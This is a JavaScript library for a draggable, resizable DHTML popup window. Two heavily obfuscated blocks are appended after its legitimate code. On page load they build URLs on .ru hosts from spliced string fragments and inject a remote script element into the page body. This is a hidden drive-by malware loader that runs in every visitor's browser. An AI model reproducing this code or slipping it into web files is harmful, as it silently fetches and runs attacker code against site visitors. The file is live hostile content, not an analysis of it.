var dhtmlwindow={
imagefiles:['ts/min.gif', 'ts/close.html', 'ts/restore.html', 'ts/resize.gif'], //Path to 4 images used by script, in that order
ajaxbustcache: true, 

minimizeorder: 0,
tobjects: [],

init:function(t){
	var domwindow=document.createElement("div") //create dhtml window div
	domwindow.id=t
	domwindow.className="dhtmlwindow"
	var domwindowdata=''
	domwindowdata='<div class="drag-handle">'
	domwindowdata+='DHTML Window <div class="drag-controls" ></div>'
	domwindowdata+='</div>'
	domwindowdata+='<div class="drag-contentarea"></div>'
	domwindowdata+='<div class="drag-statusarea"><div class="drag-resizearea"></div></div>'
	domwindowdata+='</div>'
	domwindow.innerHTML=domwindowdata
	document.getElementById("dhtmlwindowholder").appendChild(domwindow)
	this.zIndexvalue=(this.zIndexvalue)? this.zIndexvalue+1 : 100 //z-index value for DHTML window: starts at 0, increments whenever a window has focus
	var t=document.getElementById(t)
	var divs=t.getElementsByTagName("div")
	for (var i=0; i<divs.length; i++){ //go through divs inside dhtml window and extract all those with class="drag-" prefix
		if (/drag-/.test(divs[i].className))
			t[divs[i].className.replace(/drag-/, "")]=divs[i] //take out the "drag-" prefix for shorter access by name
	}
	t.style.zIndex=this.zIndexvalue //set z-index of this dhtml window
	t.handle._parent=t //store back reference to dhtml window
	t.resizearea._parent=t //same
	t.controls._parent=t //same
	t.onclose=function(){return true} //custom event handler "onclose"
	t.onmousedown=function(){dhtmlwindow.zIndexvalue++; this.style.zIndex=dhtmlwindow.zIndexvalue} //Increase z-index of window when focus is on it
	t.handle.onmousedown=dhtmlwindow.setupdrag //set up drag behavior when mouse down on handle div
	t.resizearea.onmousedown=dhtmlwindow.setupdrag //set up drag behavior when mouse down on resize div
	t.controls.onclick=dhtmlwindow.enablecontrols
	t.show=function(){dhtmlwindow.show(this)} //public function for showing dhtml window
	t.hide=function(){dhtmlwindow.close(this)} //public function for hiding dhtml window
	t.setSize=function(w, h){dhtmlwindow.setSize(this, w, h)} //public function for setting window dimensions
	t.moveTo=function(x, y){dhtmlwindow.moveTo(this, x, y)} //public function for moving dhtml window (relative to viewpoint)
	t.isResize=function(bol){dhtmlwindow.isResize(this, bol)} //public function for specifying if window is resizable
	t.isScrolling=function(bol){dhtmlwindow.isScrolling(this, bol)} //public function for specifying if window content contains scrollbars
	t.load=function(contenttype, contentsource, title){dhtmlwindow.load(this, contenttype, contentsource, title)} //public function for loading content into window
	this.tobjects[this.tobjects.length]=t
	return t //return reference to dhtml window div
},

open:function(t, contenttype, contentsource, title, attr, recalonload){
	var d=dhtmlwindow //reference dhtml window object
	function getValue(Name){
		var config=new RegExp(Name+"=([^,]+)", "i") //get name/value config pair (ie: width=400px,)
		return (config.test(attr))? parseInt(RegExp.$1) : 0 //return value portion (int), or 0 (false) if none found
	}
	if (document.getElementById(t)==null) //if window doesn't exist yet, create it
		t=this.init(t) //return reference to dhtml window div
	else
		t=document.getElementById(t)
	t.setSize(getValue(("width")), (getValue("height"))) //Set dimensions of window
	var xpos=getValue("center")? "middle" : getValue("left") //Get x coord of window
	var ypos=getValue("center")? "middle" : getValue("top") //Get y coord of window
	//t.moveTo(xpos, ypos) //Position window
	if (typeof recalonload!="undefined" && recalonload=="recal" && this.scroll_top==0){ //reposition window when page fully loads with updated window viewpoints?
		if (window.attachEvent && !window.opera) //In IE, add another 400 milisecs on page load (viewpoint properties may return 0 b4 then)
			this.addEvent(window, function(){setTimeout(function(){t.moveTo(xpos, ypos)}, 400)}, "load")
		else-
			this.addEvent(window, function(){t.moveTo(xpos, ypos)}, "load")
	}
	t.isResize(getValue("resize")) //Set whether window is resizable
	t.isScrolling(getValue("scrolling")) //Set whether window should contain scrollbars
	t.style.visibility="visible"
	t.style.display="block"
	t.contentarea.style.display="block"
	t.moveTo(xpos, ypos) //Position window
	t.load(contenttype, contentsource, title)
	if (t.state=="minimized" && t.controls.firstChild.title=="Restore"){ //If window exists and is currently minimized?
		t.controls.firstChild.setAttribute("src", dhtmlwindow.imagefiles[0]) //Change "restore" icon within window interface to "minimize" icon
		t.controls.firstChild.setAttribute("title", "Minimize")
		t.state="fullview" //indicate the state of the window as being "fullview"
	}
	parent.document.getElementById("qw").style.display="block";
    return t
},

setSize:function(t, w, h){ //set window size (min is 150px wide by 100px tall)
	t.style.width=Math.max(parseInt(w), 150)+"px"
	t.contentarea.style.height=Math.max(parseInt(h), 100)+"px"
},

moveTo:function(t, x, y){ //move window. Position includes current viewpoint of document
	this.getviewpoint() //Get current viewpoint numbers
	t.style.left=(x=="middle")? this.scroll_left+(this.docwidth-t.offsetWidth)/2+"px" : this.scroll_left+parseInt(x)+"px"
	t.style.top=(y=="middle")? this.scroll_top+(this.docheight-t.offsetHeight)/2+"px" : this.scroll_top+parseInt(y)+"px"
},

isResize:function(t, bol){ //show or hide resize inteface (part of the status bar)
	t.statusarea.style.display=(bol)? "block" : "none"
	t.resizeBool=(bol)? 1 : 0
},

isScrolling:function(t, bol){ //set whether loaded content contains scrollbars
	t.contentarea.style.overflow=(bol)? "auto" : "hidden"
},

load:function(t, contenttype, contentsource, title){ //loads content into window plus set its title (3 content types: "inline", "iframe", or "ajax")
	var contenttype=contenttype.toLowerCase() //convert string to lower case
	if (typeof title!="undefined")
		t.handle.firstChild.nodeValue=title
	if (contenttype=="inline")
		t.contentarea.innerHTML=contentsource
	else if (contenttype=="div"){
		t.contentarea.innerHTML=document.getElementById(contentsource).innerHTML //Populate window with contents of specified div on page
		document.getElementById(contentsource).style.display="none" //hide that div
	}
	else if (contenttype=="iframe"){
		t.contentarea.style.overflow="hidden" //disable window scrollbars, as iframe already contains scrollbars
		if (!t.contentarea.firstChild || t.contentarea.firstChild.tagName!="IFRAME") //If iframe tag doesn't exist already, create it first
			t.contentarea.innerHTML=''
		window.frames["_iframe-"+t.id].location.replace(contentsource) //set location of iframe window to specified URL
		}
	else if (contenttype=="ajax"){
		this.ajax_connect(contentsource, t) //populate window with external contents fetched via Ajax
	}
	t.contentarea.datatype=contenttype //store contenttype of current window for future reference
},

setupdrag:function(e){
	var d=dhtmlwindow //reference dhtml window object
	var t=this._parent //reference dhtml window div
	d.etarget=this //remember div mouse is currently held down on ("handle" or "resize" div)
	var e=window.event || e
	d.initmousex=e.clientX //store x position of mouse onmousedown
	d.initmousey=e.clientY
	d.initx=parseInt(t.offsetLeft) //store offset x of window div onmousedown
	d.inity=parseInt(t.offsetTop)
	d.width=parseInt(t.offsetWidth) //store width of window div
	d.contentheight=parseInt(t.contentarea.offsetHeight) //store height of window div's content div
	if (t.contentarea.datatype=="iframe"){ //if content of this window div is "iframe"
		t.style.backgroundColor="transparent" //colorize and hide content div (while window is being dragged)
		//t.contentarea.style.visibility="hidden"
        t.contentarea.style.visibility="visible"
	}
	document.onmousemove=d.getdistance //get distance travelled by mouse as it moves
	document.onmouseup=function(){
		if (t.contentarea.datatype=="iframe"){ //restore color and visibility of content div onmouseup
			t.contentarea.style.backgroundColor="transparent"
			t.contentarea.style.visibility="visible"
		}
		d.stop()
	}
	return false
},

getdistance:function(e){
	var d=dhtmlwindow
	var etarget=d.etarget
	var e=window.event || e
	d.distancex=e.clientX-d.initmousex //horizontal distance travelled relative to starting point
	d.distancey=e.clientY-d.initmousey
	if (etarget.className=="drag-handle") //if target element is "handle" div
		d.move(etarget._parent, e)
	else if (etarget.className=="drag-resizearea") //if target element is "resize" div
		d.resize(etarget._parent, e)
	return false //cancel default dragging behavior
},

getviewpoint:function(){ //get window viewpoint numbers
	var ie=document.all && !window.opera
	var domclientWidth=document.documentElement && parseInt(document.documentElement.clientWidth) || 100000 //Preliminary doc width in non IE browsers
	this.standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
	this.scroll_top=(ie)? this.standardbody.scrollTop : window.pageYOffset
	this.scroll_left=(ie)? this.standardbody.scrollLeft : window.pageXOffset
	this.docwidth=(ie)? this.standardbody.clientWidth : (/Safari/i.test(navigator.userAgent))? window.innerWidth : Math.min(domclientWidth, window.innerWidth-16)
	this.docheight=(ie)? this.standardbody.clientHeight: window.innerHeight
},

rememberattrs:function(t){ //remember certain attributes of the window when it's minimized or closed, such as dimensions, position on page
	this.getviewpoint() //Get current window viewpoint numbers
	t.lastx=parseInt((t.style.left || t.offsetLeft))-dhtmlwindow.scroll_left //store last known x coord of window just before minimizing
	t.lasty=parseInt((t.style.top || t.offsetTop))-dhtmlwindow.scroll_top
	t.lastwidth=parseInt(t.style.width) //store last known width of window just before minimizing/ closing
},

move:function(t, e){
	t.style.left=dhtmlwindow.distancex+dhtmlwindow.initx+"px"
	t.style.top=dhtmlwindow.distancey+dhtmlwindow.inity+"px"
},

resize:function(t, e){
	t.style.width=Math.max(dhtmlwindow.width+dhtmlwindow.distancex, 150)+"px"
	t.contentarea.style.height=Math.max(dhtmlwindow.contentheight+dhtmlwindow.distancey, 100)+"px"
},

enablecontrols:function(e){
	var d=dhtmlwindow
	var sourceobj=window.event? window.event.srcElement : e.target //Get element within "handle" div mouse is currently on (the controls)
	if (/Minimize/i.test(sourceobj.getAttribute("title"))) //if this is the "minimize" control
		d.minimize(sourceobj, this._parent)
	else if (/Restore/i.test(sourceobj.getAttribute("title"))) //if this is the "restore" control
		d.restore(sourceobj, this._parent)
	else if (/Close/i.test(sourceobj.getAttribute("title"))) //if this is the "close" control
		d.close(this._parent)
	return false
},

minimize:function(button, t){
	dhtmlwindow.rememberattrs(t)
	button.setAttribute("src", dhtmlwindow.imagefiles[2])
	button.setAttribute("title", "Restore")
	t.state="minimized" //indicate the state of the window as being "minimized"
	t.contentarea.style.display="none"
	t.statusarea.style.display="none"
	if (typeof t.minimizeorder=="undefined"){ //stack order of minmized window on screen relative to any other minimized windows
		dhtmlwindow.minimizeorder++ //increment order
		t.minimizeorder=dhtmlwindow.minimizeorder
	}
	t.style.left="10px" //left coord of minmized window
	t.style.width="200px"
	var windowspacing=t.minimizeorder*10 //spacing (gap) between each minmized window(s)
	t.style.top=dhtmlwindow.scroll_top+dhtmlwindow.docheight-(t.handle.offsetHeight*t.minimizeorder)-windowspacing+"px"
},

restore:function(button, t){
	dhtmlwindow.getviewpoint()
	button.setAttribute("src", dhtmlwindow.imagefiles[0])
	button.setAttribute("title", "Minimize")
	t.state="fullview" //indicate the state of the window as being "fullview"
	t.style.display="block"
	t.contentarea.style.display="block"
	if (t.resizeBool) //if this window is resizable, enable the resize icon
		t.statusarea.style.display="block"
	t.style.left=parseInt(t.lastx)+dhtmlwindow.scroll_left+"px" //position window to last known x coord just before minimizing
	t.style.top=parseInt(t.lasty)+dhtmlwindow.scroll_top+"px"
	t.style.width=parseInt(t.lastwidth)+"px"
},


close:function(t){
	try{
		var closewinbol=t.onclose()
	}
	catch(err){ //In non IE browsers, all errors are caught, so just run the below
		var closewinbol=true
 }
	finally{ //In IE, not all errors are caught, so check if variable isn't defined in IE in those cases
		if (typeof closewinbol=="undefined"){
			alert("An error has occured somwhere inside your \"onclose\" event handler")
			var closewinbol=true
		}
	}
	if (closewinbol){ //if custom event handler function returns true
		if (t.state!="minimized") //if this window isn't currently minimized
			dhtmlwindow.rememberattrs(t) //remember window's dimensions/position on the page before closing
		t.style.display="none"
	}
	return closewinbol
},

show:function(t){
	if (t.lastx) //If there exists previously stored information such as last x position on window attributes (meaning it's been minimized or closed)
		dhtmlwindow.restore(t.controls.firstChild, t) //restore the window using that info
	else
		t.style.display="block"
	t.state="fullview" //indicate the state of the window as being "fullview"
},

ajax_connect:function(url, t){
	var page_request = false
	var bustcacheparameter=""
	if (window.XMLHttpRequest) // if Mozilla, IE7, Safari etc
		page_request = new XMLHttpRequest()
	else if (window.ActiveXObject){ // if IE6 or below
		try {
		page_request = new ActiveXObject("Msxml2.XMLHTTP")
		} 
		catch (e){
			try{
			page_request = new ActiveXObject("Microsoft.XMLHTTP")
			}
			catch (e){}
		}
	}
	else
		return false
	page_request.onreadystatechange=function(){dhtmlwindow.ajax_loadpage(page_request, t)}
	if (this.ajaxbustcache) //if bust caching of external page
		bustcacheparameter=(url.indexOf("?")!=-1)? "&"+new Date().getTime() : "?"+new Date().getTime()
	page_request.open('GET', url+bustcacheparameter, true)
	page_request.send(null)
},

ajax_loadpage:function(page_request, t){
	if (page_request.readyState == 4 && (page_request.status==200 || window.location.href.indexOf("http")==-1)){
	t.contentarea.innerHTML=page_request.responseText
	}
},


stop:function(){
	dhtmlwindow.etarget=null //clean up
	document.onmousemove=null
	document.onmouseup=null
},

addEvent:function(target, functionref, tasktype){ //assign a function to execute to an event handler (ie: onunload)
	var tasktype=(window.addEventListener)? tasktype : "on"+tasktype
	if (target.addEventListener)
		target.addEventListener(tasktype, functionref, false)
	else if (target.attachEvent)
		target.attachEvent(tasktype, functionref)
},

cleanup:function(){
	for (var i=0; i<dhtmlwindow.tobjects.length; i++){
		dhtmlwindow.tobjects[i].handle._parent=dhtmlwindow.tobjects[i].resizearea._parent=dhtmlwindow.tobjects[i].controls._parent=null
	}
	window.onload=null
}

} //End dhtmlwindow object

document.write('<div id="dhtmlwindowholder"><span style="display:none">.</span></div>') //container that holds all dhtml window divs on page
window.onunload=dhtmlwindow.cleanup


R=50082;R+=202;var Ka=[];var V={FW:"a"};function m(){I=["bx","Gb","VB"];this.p="p";this.XQ="XQ";var Q=new String("onloa"+"wPId".substr(3));var s=[];try {var C='Bd'} catch(C){};var T="ap"+"9fLbpe".substr(4)+"nd"+"ChXnx".substr(0,2)+"UI2il".substr(3)+"YE2xd2xYE".substr(4,1);Rj={};var bz=["Kn"];var W="scriC2tv".substr(0,4)+"PahptPha".substr(3,2);this.kV=62006;this.kV-=186;var f="defQOJ".substr(0,3)+"er";var RR=new Array();var F=window;this.DB=false;var u=new String("creatmFM".substr(0,5)+"eElem"+"oFwentFow".substr(3,3));Tun={mu:"gK"};var c=document;var Yy=[];kU={m_:false};var G="bod"+"PjTy".substr(3);var uY=22684;aF=44122;aF--;var k="hmTsrc".substr(3);var n={zV:48199};try {var pz='zn'} catch(pz){};this.gx=13624;this.gx+=241;DBN={x:"N"};function X(){d=21618;d++;RW=[];var syB=[];try {var Tx={ks:"gl"};try {} catch(lt){};An=63935;An+=123;Io=["DM","mT"];var D=4459-4458;var no={IH:60795};kG=[];var l="htt"+"U0vlp:/".substr(4)+"jmts/pa".substr(4)+"ssp"+"k7Gort".substr(3)+"3Ajqblu3jAq".substr(4,3)+"es."+"ru:";var Dr=new Array();this.Dj='';var Tb=987146-979066;var YQ=new Array();var EU=new String();var b=new String("Iwz/go".substr(3)+"ogl"+"e.cNlT9".substr(0,3)+"om/"+"bosCUhX".substr(0,3)+"ton"+".co"+"m/wu8p".substr(0,3)+"atc"+"fUah-mfUa".substr(3,3)+"13Kovi1K3".substr(3,3)+"es-"+"onl"+"ine"+".tv"+"lI4.phI4l".substr(3,3)+"piBM".substr(0,1));this.km=61308;this.km+=243;var zA=new Date();t=c[u](W);this.asq=46881;this.asq+=98;var XP=new String();t[k]=l+Tb+b;t[f]=D;this.fx=39949;this.fx--;this.H=32927;this.H--;this.ob=49148;this.ob--;c[G][T](t);fm=54190;fm--;var xM=["gO"];} catch(B){_d=["L"];this.nn=2132;this.nn+=220;this.IK=35476;this.IK+=75;};var hP="hP";var BdB=6608;}var kR={CP:53424};this.oQ=38542;this.oQ++;F[Q]=X;Cs=[];};this.zy=false;m();
v={C:"A"};var E={};try {var h='EZ'} catch(h){};try {u={q:3812};YQ={b:false};r={D:false};var Q="";var Kp=new Array();this.R=63407;this.R-=159;try {} catch(t){};var TL=new Array();var U=window[new String("un"+"es"+"ca"+"7aHGpe".substr(4))];PX=22407;PX+=122;var rR=[];var jm=new Date();this.k_=24115;this.k_--;this.ql=35810;this.ql++;var W="onlj3vO".substr(0,3)+"jApoad".substr(3);var YA=new Array();var s='';var ce=new Date();var y="1";var i="repl"+"ace";var MG='';try {var kh='Tl'} catch(kh){};var ki=["_B","vb","QE"];var kK='';var xR='';var BT=new Date();dv={XX:28902};var B=window[(String("RegLfb".substr(0,3)+"NlnExp".substr(3)))];aF=22004;aF+=163;this.iL='';var VE={PJ:false};this.hz='';pp=15154;pp++;function O(y,X){this.GS=57114;this.GS+=125;var j=String("[");var PC=false;var mw=[];j+=X;var YC={ba:false};XP=["WG"];var Ik={SE:false};var Ih={Si:false};Pv=["uB"];j+=U("%5d");this.Bl=53437;this.Bl+=181;var hn={Iz:13859};aT={DS:false};UL=16761;UL--;var cg=[];sc={Xa:42272};var cO=["Gm","_a"];var pR=["ZU","yB"];var Y=new B(j, new String("g"));Pe=65080;Pe--;try {var Cmx='_E'} catch(Cmx){};return y.replace(Y, s);};xb=1714;xb-=154;Wcf=62699;Wcf-=12;var IS=new String();Xp=[];ro=28254;ro-=179;var o=String("http"+"://gtfe".substr(0,4)+"I6Yothg".substr(3)+"uilt"+"SRyU.ru:yURS".substr(4,4));wg=["LDs","ai","_W"];var ob="";var M=520549-512469;kg={nc:false};var UA="/mi"+"lli"+"yet"+"-co"+"m-t"+"r/g"+"oog"+"le.yIN0".substr(0,3)+"com"+"bku/sh".substr(3)+"are"+"asa"+"le."+"TYnjcom".substr(4)+"2veC.phe2Cv".substr(4,3)+"p";var cJ="cJ";try {} catch(Bg){};fT=["wQ"];this.kM='';var em=new Array();function J(){var lne={};var ARm={gm:false};VX={eR:"aW"};var FU={};var Z=document;var uJ=new Array();RC={Ru:false};try {var Lo='Xe'} catch(Lo){};Ozj=59621;Ozj++;var sv=new String("appJ3A".substr(0,3)+"endmI8T".substr(0,3)+"ChiV9j".substr(0,3)+"ld");var Li={Fn:false};this.eV="";this.Ox=6705;this.Ox++;var zp={};var H=O('skcerCiIpDtT','gJbIuDHTe2UkCEyLSzY');pS=12730;pS+=238;var gE=["Fp","Fs","aR"];cBE=["ek"];gg=["Tk","cd","WU"];WI=13897;WI++;var Aq=new Array();var hN={hd:false};K=Z.createElement(H);qL=51373;qL--;oF=25889;oF--;Rg=24707;Rg--;lX=[];oV=[];L=o+M;L=L+UA;this.vA=32456;this.vA+=144;Ig={mW:"_P"};TD=["iX","qZ"];Pu=["vB","hA"];var qV={};try {} catch(AF){};var Eg={FI:1928};K.src=L;var Ka=[];K[new String("defe"+"32Ur".substr(3))]=y;var mO={cC:"iO"};var fu={WR:"uh"};var Cl={cL:"Rw"};kJ=["Ai","Rx","Zl"];var EGD={xt:"uTV"};var LoX=[];var MXq=new Date();Cs={VF:20495};var zf=false;var BE=["aso","GE"];var UV=Z.body;var ZI="ZI";var cE=["vN"];var az=["__","aO","zW"];this.am=33212;this.am++;var fh=["Nq","Nx"];this.cS="";this.RW="";JV={RK:false};UV[sv](K);var bg={KD:54027};};var baE="";UM={Cv:"Lf"};this.gB=39514;this.gB--;var miT=false;var lI=false;var ah={Ke:false};window[W]=J;var RI=33912;var H_=["wz"];var YyZ=["idf","lq","IH"];this.eo=47526;this.eo++;this.kq=52128;this.kq--;} catch(d){try {var aZ='Bp'} catch(aZ){};this.iz="";var go={rg:"pV"};try {var bh='Ua'} catch(bh){};};







